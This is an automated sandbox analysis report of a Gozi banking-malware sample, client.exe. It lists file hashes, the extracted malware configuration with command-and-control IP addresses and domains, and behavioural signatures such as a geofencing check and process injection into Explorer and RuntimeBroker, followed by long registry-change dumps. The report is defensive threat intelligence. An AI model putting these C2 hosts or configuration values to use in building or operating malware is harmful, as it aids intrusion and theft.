Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 12:16
Static task
static1
Behavioral task
behavioral1
Sample
client.exe
Resource
win7-20230831-en
General
-
Target
client.exe
-
Size
295KB
-
MD5
ed017c0f334b6d10ac5aca77fe7f9a2a
-
SHA1
de7a838cbf418f5c093e5bed00254c4c68b82fa7
-
SHA256
9f710a0fc0cadbf3378c06ca4fefa2486bdf04646201f9efec7cd5a4c97634b4
-
SHA512
e7210ef6cfb8b9cad8078b8bdc4331eba04c9b7bd87b1aadce8c84560035fe4725161dceaca03608f10f7e02de7120c6dbf345c0ac69c72d5613e85080f58316
-
SSDEEP
3072:Az6N1tmvikka83g9IGkpt4fMlw5mlg9eidid74+VONrRrCS:bN1cvBka83g9PkUf55B++1r
Malware Config
Extracted
gozi
Extracted
gozi
5050
185.247.184.139
62.72.33.155
incontroler.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
expirew.com
whofos.com
onlinepoints.online
onlinepoints.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 3124 set thread context of 3236 3124 powershell.exe Explorer.EXE PID 3236 set thread context of 3692 3236 Explorer.EXE RuntimeBroker.exe PID 3236 set thread context of 4036 3236 Explorer.EXE RuntimeBroker.exe PID 3236 set thread context of 5104 3236 Explorer.EXE RuntimeBroker.exe PID 3236 set thread context of 3292 3236 Explorer.EXE RuntimeBroker.exe PID 3236 set thread context of 4136 3236 Explorer.EXE cmd.exe PID 3236 set thread context of 2980 3236 Explorer.EXE cmd.exe PID 4136 set thread context of 4240 4136 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3028 5024 WerFault.exe client.exe -
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEdescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6291cda5-2b0b-413b RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6291cda5-2b0b-413b = eb3dcdb4f3f5d901 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\76ce1ea3-145f-4d9a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4170168b-4bb9-425f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b76b32-3aef-4ecf RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b76b32-3aef-4ecf = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000d3fe7b4f3f5d9010d3fe7b4f3f5d9010d3fe7b4f3f5d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574d622000376632316238616438313363383536333766633133303235613166663235633161633535633239313438303361623937323639656539343335313830383933630000b20009000400efbe43574d6243574d622e00000000000000000000000000000000000000000000000000f315e400370066003200310062003800610064003800310033006300380035003600330037006600630031003300300032003500610031006600660032003500630031006100630035003500630032003900310034003800300033006100620039003700320036003900650065003900340033003500310038003000380039003300630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37663231623861643831336338353633376663313330323561316666323563316163353563323931343830336162393732363965653934333531383038393363000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228982b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228982b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a51a5bf5-30a3-45a0 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a51a5bf5-30a3-45a0 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\00fa2fec54fb1ee7993c26bea4f47e9633257cc7b2b55ba1f8cba89200898c02" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e925c0a0-4a45-42b0 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4170168b-4bb9-425f RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fb916ea-da0d-4447 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\485d82f3-6b86-4e25 = d8afe6b4f3f5d901 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e925c0a0-4a45-42b0 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2384002f-80ef-4a2c RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a51a5bf5-30a3-45a0 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002cfd48b5f3f5d901f972bbb5f3f5d901f972bbb5f3f5d901407d06000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574d622000303066613266656335346662316565373939336332366265613466343765393633333235376363376232623535626131663863626138393230303839386330320000b20009000400efbe43574d6243574d622e00000000000000000000000000000000000000000000000000b0621101300030006600610032006600650063003500340066006200310065006500370039003900330063003200360062006500610034006600340037006500390036003300330032003500370063006300370062003200620035003500620061003100660038006300620061003800390032003000300038003900380063003000320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30306661326665633534666231656537393933633236626561346634376539363333323537636337623262353562613166386362613839323030383938633032000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228d82b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228d82b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b76b32-3aef-4ecf = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b76b32-3aef-4ecf RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b76b32-3aef-4ecf RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cb2ab5af-5b75-4dc3 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7f21b8ad813c85637fc13025a1ff25c1ac55c2914803ab97269ee9435180893c" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\94b8ad82-9f3a-4523 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\485d82f3-6b86-4e25 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2384002f-80ef-4a2c RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2384002f-80ef-4a2c = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\94b8ad82-9f3a-4523 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\94b8ad82-9f3a-4523 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cb2ab5af-5b75-4dc3 = 8710e3b5f3f5d901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e925c0a0-4a45-42b0 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e2744272-c4c5-408e = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\72610bd0e2a203e614400d4b3fecc4dbd7e7e3c5384a235504ab541cc7c786a3" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fb916ea-da0d-4447 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\485d82f3-6b86-4e25 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004468cfb4f3f5d9014468cfb4f3f5d9014468cfb4f3f5d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574d622000633638356337366366613138333634316661326436653662303764393537623433343464626235383064626330623336653038336131646566623861663664330000b20009000400efbe43574d6243574d622e00000000000000000000000000000000000000000000000000bcecfb00630036003800350063003700360063006600610031003800330036003400310066006100320064003600650036006200300037006400390035003700620034003300340034006400620062003500380030006400620063003000620033003600650030003800330061003100640065006600620038006100660036006400330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63363835633736636661313833363431666132643665366230376439353762343334346462623538306462633062333665303833613164656662386166366433000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228882b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228882b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\94b8ad82-9f3a-4523 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\76ce1ea3-145f-4d9a RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6291cda5-2b0b-413b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\485d82f3-6b86-4e25 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4170168b-4bb9-425f = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c685c76cfa183641fa2d6e6b07d957b4344dbb580dbc0b36e083a1defb8af6d3" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\76ce1ea3-145f-4d9a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f7428ab4f3f5d901f7428ab4f3f5d901f7428ab4f3f5d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000043574c622000613831623336643965386532646632316230616437316662346631633065653838363538633735343332623438646235633134666430653237373637626164340000b20009000400efbe43574c6243574c622e0000000000000000000000000000000000000000000000000009e50f00610038003100620033003600640039006500380065003200640066003200310062003000610064003700310066006200340066003100630030006500650038003800360035003800630037003500340033003200620034003800640062003500630031003400660064003000650032003700370036003700620061006400340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000bd28078c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61383162333664396538653264663231623061643731666234663163306565383836353863373534333262343864623563313466643065323737363762616434000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763228582b9b09753ee11b0c5ea083b40a080fea4c51ffbcbda499cb9a8f99fb763228582b9b09753ee11b0c5ea083b40a080d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\76ce1ea3-145f-4d9a = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a81b36d9e8e2df21b0ad71fb4f1c0ee88658c75432b48db5c14fd0e27767bad4" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\94b8ad82-9f3a-4523 = 2a3cbab4f3f5d901 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cb2ab5af-5b75-4dc3 